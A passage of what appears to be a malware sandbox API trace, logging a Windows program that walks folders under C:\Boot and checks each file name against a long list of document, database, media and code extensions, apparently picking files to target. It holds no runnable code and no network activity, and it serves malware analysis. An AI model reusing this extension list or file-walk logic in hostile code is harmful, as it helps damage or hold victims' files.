	[0032.897] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1
	[0032.897] lstrlenW (lpString=".dx") returned 3
	[0032.897] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1
	[0032.897] lstrlenW (lpString=".dxf") returned 4
	[0032.898] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1
	[0032.898] lstrlenW (lpString=".edml") returned 5
	[0032.898] lstrcmpiW (lpString1=".edml", lpString2="e.mui") returned -1
	[0032.898] lstrlenW (lpString=".efd") returned 4
	[0032.898] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1
	[0032.898] lstrlenW (lpString=".elf") returned 4
	[0032.898] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1
	[0032.898] lstrlenW (lpString=".emf") returned 4
	[0032.898] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1
	[0032.898] lstrlenW (lpString=".emz") returned 4
	[0032.898] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1
	[0032.898] lstrlenW (lpString=".epf") returned 4
	[0032.898] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1
	[0032.898] lstrlenW (lpString=".eps") returned 4
	[0032.898] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1
	[0032.898] lstrlenW (lpString=".epsf") returned 5
	[0032.898] lstrcmpiW (lpString1=".epsf", lpString2="e.mui") returned -1
	[0032.898] lstrlenW (lpString=".epsp") returned 5
	[0032.898] lstrcmpiW (lpString1=".epsp", lpString2="e.mui") returned -1
	[0032.898] lstrlenW (lpString=".erf") returned 4
	[0032.898] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1
	[0032.898] lstrlenW (lpString=".exr") returned 4
	[0032.898] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1
	[0032.898] lstrlenW (lpString=".f4v") returned 4
	[0032.898] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1
	[0032.898] lstrlenW (lpString=".fido") returned 5
	[0032.898] lstrcmpiW (lpString1=".fido", lpString2="e.mui") returned -1
	[0032.898] lstrlenW (lpString=".flm") returned 4
	[0032.898] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1
	[0032.898] lstrlenW (lpString=".flv") returned 4
	[0032.898] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1
	[0032.898] lstrlenW (lpString=".frm") returned 4
	[0032.898] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1
	[0032.898] lstrlenW (lpString=".fxg") returned 4
	[0032.898] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1
	[0032.899] lstrlenW (lpString=".geo") returned 4
	[0032.899] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1
	[0032.899] lstrlenW (lpString=".gif") returned 4
	[0032.899] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1
	[0032.899] lstrlenW (lpString=".grs") returned 4
	[0032.899] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1
	[0032.899] lstrlenW (lpString=".gz") returned 3
	[0032.899] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1
	[0032.899] lstrlenW (lpString=".h") returned 2
	[0032.899] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1
	[0032.899] lstrlenW (lpString=".hdr") returned 4
	[0032.899] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1
	[0032.899] lstrlenW (lpString=".hpp") returned 4
	[0032.899] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1
	[0032.899] lstrlenW (lpString=".hta") returned 4
	[0032.899] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1
	[0032.899] lstrlenW (lpString=".htc") returned 4
	[0032.899] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1
	[0032.899] lstrlenW (lpString=".htm") returned 4
	[0032.899] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1
	[0032.899] lstrlenW (lpString=".html") returned 5
	[0032.899] lstrcmpiW (lpString1=".html", lpString2="e.mui") returned -1
	[0032.899] lstrlenW (lpString=".icb") returned 4
	[0032.899] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1
	[0032.899] lstrlenW (lpString=".ics") returned 4
	[0032.899] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1
	[0032.899] lstrlenW (lpString=".iff") returned 4
	[0032.899] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1
	[0032.899] lstrlenW (lpString=".inc") returned 4
	[0032.899] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1
	[0032.899] lstrlenW (lpString=".indd") returned 5
	[0032.899] lstrcmpiW (lpString1=".indd", lpString2="e.mui") returned -1
	[0032.899] lstrlenW (lpString=".ini") returned 4
	[0032.899] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1
	[0032.899] lstrlenW (lpString=".iqy") returned 4
	[0032.899] lstrcmpiW (lpString1=".iqy", lpString2=".mui") returned -1
	[0032.900] lstrlenW (lpString=".j2c") returned 4
	[0032.900] lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1
	[0032.900] lstrlenW (lpString=".j2k") returned 4
	[0032.900] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1
	[0032.900] lstrlenW (lpString=".java") returned 5
	[0032.900] lstrcmpiW (lpString1=".java", lpString2="e.mui") returned -1
	[0032.900] lstrlenW (lpString=".jp2") returned 4
	[0032.900] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1
	[0032.900] lstrlenW (lpString=".jpc") returned 4
	[0032.900] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1
	[0032.900] lstrlenW (lpString=".jpe") returned 4
	[0032.900] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1
	[0032.900] lstrlenW (lpString=".jpeg") returned 5
	[0032.900] lstrcmpiW (lpString1=".jpeg", lpString2="e.mui") returned -1
	[0032.900] lstrlenW (lpString=".jpf") returned 4
	[0032.900] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1
	[0032.900] lstrlenW (lpString=".jpg") returned 4
	[0032.900] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0032.900] lstrlenW (lpString=".jpx") returned 4
	[0032.900] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1
	[0032.900] lstrlenW (lpString=".js") returned 3
	[0032.900] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1
	[0032.900] lstrlenW (lpString=".jsf") returned 4
	[0032.900] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned -1
	[0032.900] lstrlenW (lpString=".json") returned 5
	[0032.900] lstrcmpiW (lpString1=".json", lpString2="e.mui") returned -1
	[0032.900] lstrlenW (lpString=".jsp") returned 4
	[0032.900] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1
	[0032.900] lstrlenW (lpString=".kdc") returned 4
	[0032.900] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1
	[0032.900] lstrlenW (lpString=".kmz") returned 4
	[0032.900] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1
	[0032.900] lstrlenW (lpString=".kwm") returned 4
	[0032.900] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1
	[0032.900] lstrlenW (lpString=".lasso") returned 6
	[0032.901] lstrcmpiW (lpString1=".lasso", lpString2="xe.mui") returned -1
	[0032.901] lstrlenW (lpString=".lbi") returned 4
	[0032.901] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1
	[0032.901] lstrlenW (lpString=".lgf") returned 4
	[0032.901] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1
	[0032.901] lstrlenW (lpString=".lgp") returned 4
	[0032.901] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1
	[0032.901] lstrlenW (lpString=".log") returned 4
	[0032.901] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1
	[0032.901] lstrlenW (lpString=".m1v") returned 4
	[0032.901] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1
	[0032.901] lstrlenW (lpString=".m4a") returned 4
	[0032.901] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1
	[0032.901] lstrlenW (lpString=".m4v") returned 4
	[0032.901] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1
	[0032.901] lstrlenW (lpString=".max") returned 4
	[0032.901] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1
	[0032.901] lstrlenW (lpString=".md") returned 3
	[0032.901] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1
	[0032.901] lstrlenW (lpString=".mda") returned 4
	[0032.901] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1
	[0032.901] lstrlenW (lpString=".mdb") returned 4
	[0032.901] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1
	[0032.901] lstrlenW (lpString=".mde") returned 4
	[0032.901] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1
	[0032.901] lstrlenW (lpString=".mdf") returned 4
	[0032.901] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1
	[0032.901] lstrlenW (lpString=".mdw") returned 4
	[0032.901] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1
	[0032.901] lstrlenW (lpString=".mef") returned 4
	[0032.901] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1
	[0032.901] lstrlenW (lpString=".mft") returned 4
	[0032.901] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1
	[0032.901] lstrlenW (lpString=".mfw") returned 4
	[0032.901] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1
	[0032.902] lstrlenW (lpString=".mht") returned 4
	[0032.902] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1
	[0032.902] lstrlenW (lpString=".mhtml") returned 6
	[0032.902] lstrcmpiW (lpString1=".mhtml", lpString2="xe.mui") returned -1
	[0032.902] lstrlenW (lpString=".mka") returned 4
	[0032.902] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1
	[0032.902] lstrlenW (lpString=".mkidx") returned 6
	[0032.902] lstrcmpiW (lpString1=".mkidx", lpString2="xe.mui") returned -1
	[0032.902] lstrlenW (lpString=".mkv") returned 4
	[0032.902] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1
	[0032.902] lstrlenW (lpString=".mos") returned 4
	[0032.902] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1
	[0032.902] lstrlenW (lpString=".mov") returned 4
	[0032.902] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1
	[0032.902] lstrlenW (lpString=".mp3") returned 4
	[0032.902] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1
	[0032.902] lstrlenW (lpString=".mp4") returned 4
	[0032.902] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1
	[0032.902] lstrlenW (lpString=".mpeg") returned 5
	[0032.902] lstrcmpiW (lpString1=".mpeg", lpString2="e.mui") returned -1
	[0032.902] lstrlenW (lpString=".mpg") returned 4
	[0032.902] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned -1
	[0032.902] lstrlenW (lpString=".mpv") returned 4
	[0032.902] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1
	[0032.902] lstrlenW (lpString=".mrw") returned 4
	[0032.902] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1
	[0032.902] lstrlenW (lpString=".msg") returned 4
	[0032.902] lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1
	[0032.902] lstrlenW (lpString=".mxl") returned 4
	[0032.902] lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1
	[0032.902] lstrlenW (lpString=".myd") returned 4
	[0032.902] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1
	[0032.902] lstrlenW (lpString=".myi") returned 4
	[0032.902] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1
	[0032.902] lstrlenW (lpString=".nef") returned 4
	[0032.903] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1
	[0032.903] lstrlenW (lpString=".nrw") returned 4
	[0032.903] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1
	[0032.903] lstrlenW (lpString=".obj") returned 4
	[0032.903] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1
	[0032.903] lstrlenW (lpString=".odb") returned 4
	[0032.903] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1
	[0032.903] lstrlenW (lpString=".odc") returned 4
	[0032.903] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1
	[0032.903] lstrlenW (lpString=".odm") returned 4
	[0032.903] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1
	[0032.903] lstrlenW (lpString=".odp") returned 4
	[0032.903] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1
	[0032.903] lstrlenW (lpString=".ods") returned 4
	[0032.903] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1
	[0032.903] lstrlenW (lpString=".oft") returned 4
	[0032.903] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1
	[0032.903] lstrlenW (lpString=".one") returned 4
	[0032.903] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1
	[0032.903] lstrlenW (lpString=".onepkg") returned 7
	[0032.903] lstrcmpiW (lpString1=".onepkg", lpString2="exe.mui") returned -1
	[0032.903] lstrlenW (lpString=".onetoc2") returned 8
	[0032.903] lstrcmpiW (lpString1=".onetoc2", lpString2=".exe.mui") returned 1
	[0032.903] lstrlenW (lpString=".opt") returned 4
	[0032.903] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1
	[0032.903] lstrlenW (lpString=".oqy") returned 4
	[0032.903] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1
	[0032.903] lstrlenW (lpString=".orf") returned 4
	[0032.903] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1
	[0032.903] lstrlenW (lpString=".p12") returned 4
	[0032.903] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1
	[0032.903] lstrlenW (lpString=".p7b") returned 4
	[0032.903] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1
	[0032.903] lstrlenW (lpString=".p7c") returned 4
	[0032.903] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1
	[0032.903] lstrlenW (lpString=".pam") returned 4
	[0032.904] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1
	[0032.904] lstrlenW (lpString=".pbm") returned 4
	[0032.904] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1
	[0032.904] lstrlenW (lpString=".pct") returned 4
	[0032.904] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1
	[0032.904] lstrlenW (lpString=".pcx") returned 4
	[0032.904] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1
	[0032.904] lstrlenW (lpString=".pdd") returned 4
	[0032.904] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1
	[0032.904] lstrlenW (lpString=".pdf") returned 4
	[0032.904] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0032.904] lstrlenW (lpString=".pdp") returned 4
	[0032.904] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1
	[0032.904] lstrlenW (lpString=".pef") returned 4
	[0032.904] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1
	[0032.904] lstrlenW (lpString=".pem") returned 4
	[0032.904] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1
	[0032.904] lstrlenW (lpString=".pff") returned 4
	[0032.904] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1
	[0032.904] lstrlenW (lpString=".pfm") returned 4
	[0032.904] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1
	[0032.904] lstrlenW (lpString=".pfx") returned 4
	[0032.904] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1
	[0032.904] lstrlenW (lpString=".pgm") returned 4
	[0032.904] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1
	[0032.904] lstrlenW (lpString=".php") returned 4
	[0032.904] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1
	[0032.904] lstrlenW (lpString=".php3") returned 5
	[0032.904] lstrcmpiW (lpString1=".php3", lpString2="e.mui") returned -1
	[0032.904] lstrlenW (lpString=".php4") returned 5
	[0032.904] lstrcmpiW (lpString1=".php4", lpString2="e.mui") returned -1
	[0032.904] lstrlenW (lpString=".php5") returned 5
	[0032.904] lstrcmpiW (lpString1=".php5", lpString2="e.mui") returned -1
	[0032.904] lstrlenW (lpString=".phtml") returned 6
	[0032.904] lstrcmpiW (lpString1=".phtml", lpString2="xe.mui") returned -1
	[0032.905] lstrlenW (lpString=".pict") returned 5
	[0032.905] lstrcmpiW (lpString1=".pict", lpString2="e.mui") returned -1
	[0032.905] lstrlenW (lpString=".pl") returned 3
	[0032.905] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1
	[0032.905] lstrlenW (lpString=".pls") returned 4
	[0032.905] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1
	[0032.905] lstrlenW (lpString=".pm") returned 3
	[0032.905] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1
	[0032.905] lstrlenW (lpString=".png") returned 4
	[0032.905] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1
	[0032.905] lstrlenW (lpString=".pnm") returned 4
	[0032.905] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1
	[0032.905] lstrlenW (lpString=".pot") returned 4
	[0032.905] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1
	[0032.905] lstrlenW (lpString=".potm") returned 5
	[0032.905] lstrcmpiW (lpString1=".potm", lpString2="e.mui") returned -1
	[0032.905] lstrlenW (lpString=".potx") returned 5
	[0032.905] lstrcmpiW (lpString1=".potx", lpString2="e.mui") returned -1
	[0032.905] lstrlenW (lpString=".ppa") returned 4
	[0032.905] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1
	[0032.905] lstrlenW (lpString=".ppam") returned 5
	[0032.905] lstrcmpiW (lpString1=".ppam", lpString2="e.mui") returned -1
	[0032.905] lstrlenW (lpString=".ppm") returned 4
	[0032.905] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1
	[0032.905] lstrlenW (lpString=".pps") returned 4
	[0032.905] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1
	[0032.905] lstrlenW (lpString=".ppsm") returned 5
	[0032.905] lstrcmpiW (lpString1=".ppsm", lpString2="e.mui") returned -1
	[0032.905] lstrlenW (lpString=".ppt") returned 4
	[0032.905] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0032.905] lstrlenW (lpString=".pptm") returned 5
	[0032.905] lstrcmpiW (lpString1=".pptm", lpString2="e.mui") returned -1
	[0032.905] lstrlenW (lpString=".pptx") returned 5
	[0032.905] lstrcmpiW (lpString1=".pptx", lpString2="e.mui") returned -1
	[0032.905] lstrlenW (lpString=".prn") returned 4
	[0032.906] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1
	[0032.906] lstrlenW (lpString=".ps") returned 3
	[0032.906] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1
	[0032.906] lstrlenW (lpString=".psb") returned 4
	[0032.906] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1
	[0032.906] lstrlenW (lpString=".psd") returned 4
	[0032.906] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1
	[0032.906] lstrlenW (lpString=".pst") returned 4
	[0032.906] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1
	[0032.906] lstrlenW (lpString=".ptx") returned 4
	[0032.906] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1
	[0032.906] lstrlenW (lpString=".pub") returned 4
	[0032.906] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1
	[0032.906] lstrlenW (lpString=".pwm") returned 4
	[0032.906] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1
	[0032.906] lstrlenW (lpString=".pxr") returned 4
	[0032.906] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1
	[0032.906] lstrlenW (lpString=".py") returned 3
	[0032.906] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1
	[0032.906] lstrlenW (lpString=".qt") returned 3
	[0032.906] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1
	[0032.906] lstrlenW (lpString=".r3d") returned 4
	[0032.906] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1
	[0032.906] FindClose (in: hFindFile=0xb430088 | out: hFindFile=0xb430088) returned 1
	[0032.906] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb3f0050 | out: hHeap=0x7d60000) returned 1
	[0032.906] FindNextFileW (in: hFindFile=0x7e5ca88, lpFindFileData=0xa91fa84 | out: lpFindFileData=0xa91fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1
	[0032.906] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb3f0050
	[0032.907] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0xa91f808 | out: lpFindFileData=0xa91f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb430088
	[0032.907] FindNextFileW (in: hFindFile=0xb430088, lpFindFileData=0xa91f808 | out: lpFindFileData=0xa91f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0032.907] FindNextFileW (in: hFindFile=0xb430088, lpFindFileData=0xa91f808 | out: lpFindFileData=0xa91f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0033.012] lstrlenW (lpString="bootmgr.exe.mui") returned 15
	[0033.022] lstrlenW (lpString=".1cd") returned 4
	[0033.022] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0033.022] lstrlenW (lpString=".3ds") returned 4
	[0033.022] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1
	[0033.022] lstrlenW (lpString=".3fr") returned 4
	[0033.022] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1
	[0033.022] lstrlenW (lpString=".3g2") returned 4
	[0033.022] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1
	[0033.022] lstrlenW (lpString=".3gp") returned 4
	[0033.022] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1
	[0033.022] lstrlenW (lpString=".7z") returned 3
	[0033.022] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0033.022] lstrlenW (lpString=".accda") returned 6
	[0033.022] lstrcmpiW (lpString1=".accda", lpString2="xe.mui") returned -1
	[0033.022] lstrlenW (lpString=".accdb") returned 6
	[0033.022] lstrcmpiW (lpString1=".accdb", lpString2="xe.mui") returned -1
	[0033.022] lstrlenW (lpString=".accdc") returned 6
	[0033.022] lstrcmpiW (lpString1=".accdc", lpString2="xe.mui") returned -1
	[0033.022] lstrlenW (lpString=".accde") returned 6
	[0033.022] lstrcmpiW (lpString1=".accde", lpString2="xe.mui") returned -1
	[0033.022] lstrlenW (lpString=".accdt") returned 6
	[0033.022] lstrcmpiW (lpString1=".accdt", lpString2="xe.mui") returned -1
	[0033.022] lstrlenW (lpString=".accdw") returned 6
	[0033.022] lstrcmpiW (lpString1=".accdw", lpString2="xe.mui") returned -1
	[0033.023] lstrlenW (lpString=".adb") returned 4
	[0033.023] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1
	[0033.023] lstrlenW (lpString=".adp") returned 4
	[0033.023] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1
	[0033.023] lstrlenW (lpString=".ai") returned 3
	[0033.023] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1
	[0033.023] lstrlenW (lpString=".ai3") returned 4
	[0033.023] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1
	[0033.023] lstrlenW (lpString=".ai4") returned 4
	[0033.023] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1
	[0033.023] lstrlenW (lpString=".ai5") returned 4
	[0033.023] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1
	[0033.023] lstrlenW (lpString=".ai6") returned 4
	[0033.023] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1
	[0033.023] lstrlenW (lpString=".ai7") returned 4
	[0033.023] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1
	[0033.023] lstrlenW (lpString=".ai8") returned 4
	[0033.023] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1
	[0033.023] lstrlenW (lpString=".anim") returned 5
	[0033.023] lstrcmpiW (lpString1=".anim", lpString2="e.mui") returned -1
	[0033.023] lstrlenW (lpString=".arw") returned 4
	[0033.023] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1
	[0033.023] lstrlenW (lpString=".as") returned 3
	[0033.023] lstrcmpiW (lpString1=".as", lpString2="mui") returned -1
	[0033.023] lstrlenW (lpString=".asa") returned 4
	[0033.023] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1
	[0033.023] lstrlenW (lpString=".asc") returned 4
	[0033.023] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1
	[0033.023] lstrlenW (lpString=".ascx") returned 5
	[0033.023] lstrcmpiW (lpString1=".ascx", lpString2="e.mui") returned -1
	[0033.023] lstrlenW (lpString=".asm") returned 4
	[0033.023] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1
	[0033.023] lstrlenW (lpString=".asmx") returned 5
	[0033.023] lstrcmpiW (lpString1=".asmx", lpString2="e.mui") returned -1
	[0033.023] lstrlenW (lpString=".asp") returned 4
	[0033.023] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1
	[0033.024] lstrlenW (lpString=".aspx") returned 5
	[0033.024] lstrcmpiW (lpString1=".aspx", lpString2="e.mui") returned -1
	[0033.024] lstrlenW (lpString=".asr") returned 4
	[0033.024] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1
	[0033.024] lstrlenW (lpString=".asx") returned 4
	[0033.024] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1
	[0033.024] lstrlenW (lpString=".avi") returned 4
	[0033.024] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1
	[0033.024] lstrlenW (lpString=".avs") returned 4
	[0033.024] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1
	[0033.024] lstrlenW (lpString=".backup") returned 7
	[0033.024] lstrcmpiW (lpString1=".backup", lpString2="exe.mui") returned -1
	[0033.024] lstrlenW (lpString=".bak") returned 4
	[0033.024] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1
	[0033.024] lstrlenW (lpString=".bay") returned 4
	[0033.024] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1
	[0033.024] lstrlenW (lpString=".bd") returned 3
	[0033.024] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1
	[0033.024] lstrlenW (lpString=".bin") returned 4
	[0033.024] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1
	[0033.024] lstrlenW (lpString=".bmp") returned 4
	[0033.024] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1
	[0033.024] lstrlenW (lpString=".bz2") returned 4
	[0033.024] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0033.024] lstrlenW (lpString=".c") returned 2
	[0033.024] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1
	[0033.024] lstrlenW (lpString=".cdr") returned 4
	[0033.024] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1
	[0033.024] lstrlenW (lpString=".cer") returned 4
	[0033.024] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1
	[0033.024] lstrlenW (lpString=".cf") returned 3
	[0033.024] lstrcmpiW (lpString1=".cf", lpString2="mui") returned -1
	[0033.024] lstrlenW (lpString=".cfc") returned 4
